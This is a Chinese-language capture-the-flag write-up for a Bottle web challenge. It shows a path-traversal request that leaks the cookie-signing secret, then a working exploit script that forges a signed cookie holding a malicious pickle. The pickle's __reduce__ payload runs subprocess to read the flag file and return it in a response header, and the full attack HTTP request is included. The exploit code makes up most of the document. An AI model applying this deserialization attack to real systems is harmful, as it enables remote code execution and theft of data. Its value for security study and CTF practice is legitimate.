源代碼
# -*- encoding: utf-8 -*-
'''
@File : main.py
@Time : 2025/03/28 22:20:49
@Author : LamentXU
'''
'''
flag in /flag_{uuid4}
'''
from bottle import Bottle, request, response, redirect, static_file, run, route
secret = 'a'app = Bottle()
@route('/')
def index():return '''HI'''
@route('/download')
def download():name = request.query.filenameif '../../' in name or name.startswith('/') or name.startswith('../') or '\\' in name:response.status = 403return 'Forbidden'with open(name, 'rb') as f:data = f.read()return data@route('/secret')
def secret_page():try:session = request.get_cookie("name", secret=secret)if not session or session["name"] == "guest":session = {"name": "guest"}response.set_cookie("name", session, secret=secret)return 'Forbidden!'if session["name"] == "admin":return 'The secret has been deleted!'except:return "Error!"
run(host='0.0.0.0', port=8080, debug=True)
先使用目錄穿越獲得密鑰
/download?filename=./.././../secret.txt
審計庫源代碼發現存在反序列化漏洞
def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256):"""獲取 cookie 的值。如果要讀取一個“簽名的 Cookie”,則 `secret` 必須與創建 cookie 時使用的密鑰一致(參見 BaseResponse.set_cookie 方法)。如果讀取失敗(cookie 不存在或簽名不正確),則返回默認值 `default`。"""# 從 self.cookies 中獲取名為 key 的 cookie 值value = self.cookies.get(key)# 如果提供了 secret,說明需要驗證簽名(簽名的 Cookie)if secret:# 檢查 cookie 是否存在,并且以 '!' 開頭,同時包含 '?'# 這是簽名 cookie 的格式標志,例如: "!簽名?內容"if value and value.startswith('!') and '?' in value:# 拆分簽名和消息部分,并將其轉為字節sig, msg = map(tob, value[1:].split('?', 1))# 使用提供的 secret 和消息體生成 HMAC 簽名hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest()# 將生成的簽名進行 base64 編碼,與傳入的簽名進行比較if _lscmp(sig, base64.b64encode(hash)):# 簽名驗證通過后,對消息部分進行 base64 解碼,然后反序列化dst = pickle.loads(base64.b64decode(msg))# 確保反序列化后的對象是一個包含 key 和值的元組,并且 key 匹配if dst and dst[0] == key:return dst[1] # 返回解密后的 cookie 值# 如果任何一步失敗,則返回默認值return default# 如果沒有啟用簽名驗證,直接返回原始的 cookie 值或默認值return value or default
偽造cookie,誘導反序列化即可
import pickle
import hmac
import hashlib
import base64
from bottle import tobclass Evil:def __reduce__(self):return exec, ("""
result = __import__('subprocess').run(['cat','/flag_dda2d465-af33-4c56-8cc9-fd4306867b70'], capture_output=True
)
encoded = __import__('base64').b64encode(result.stdout).decode()
__import__('bottle').response.headers['X-Output'] = encoded
""",)
e = Evil()
msg = base64.b64encode(pickle.dumps(e))secret = "Hell0_H@cker_Y0u_A3r_Sm@r7"
hash = hmac.new(tob(secret), msg, digestmod=hashlib.sha256).digest()
hash = base64.b64encode(hash)print(f"""Cookie: name=\"!{str(hash)[2:-1]}?{str(msg)[2:-1]}\"""")
GET /secret HTTP/1.1
Host: eci-2ze137gfkzlk51q14vk4.cloudeci1.ichunqiu.com:5000
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: name="!kpUxGGuOD8bX1H3YEkAMzPPZiaECBAtXUDgyz110yfs=?gASVFgEAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIz6CnJlc3VsdCA9IF9faW1wb3J0X18oJ3N1YnByb2Nlc3MnKS5ydW4oCiAgICBbJ2NhdCcsJy9mbGFnX2RkYTJkNDY1LWFmMzMtNGM1Ni04Y2M5LWZkNDMwNjg2N2I3MCddLCAKICAgIGNhcHR1cmVfb3V0cHV0PVRydWUKKQplbmNvZGVkID0gX19pbXBvcnRfXygnYmFzZTY0JykuYjY0ZW5jb2RlKHJlc3VsdC5zdGRvdXQpLmRlY29kZSgpCl9faW1wb3J0X18oJ2JvdHRsZScpLnJlc3BvbnNlLmhlYWRlcnNbJ1gtT3V0cHV0J10gPSBlbmNvZGVkCpSFlFKULg=="
Connection: keep-alive
)
跨阻放大器簡單仿真)
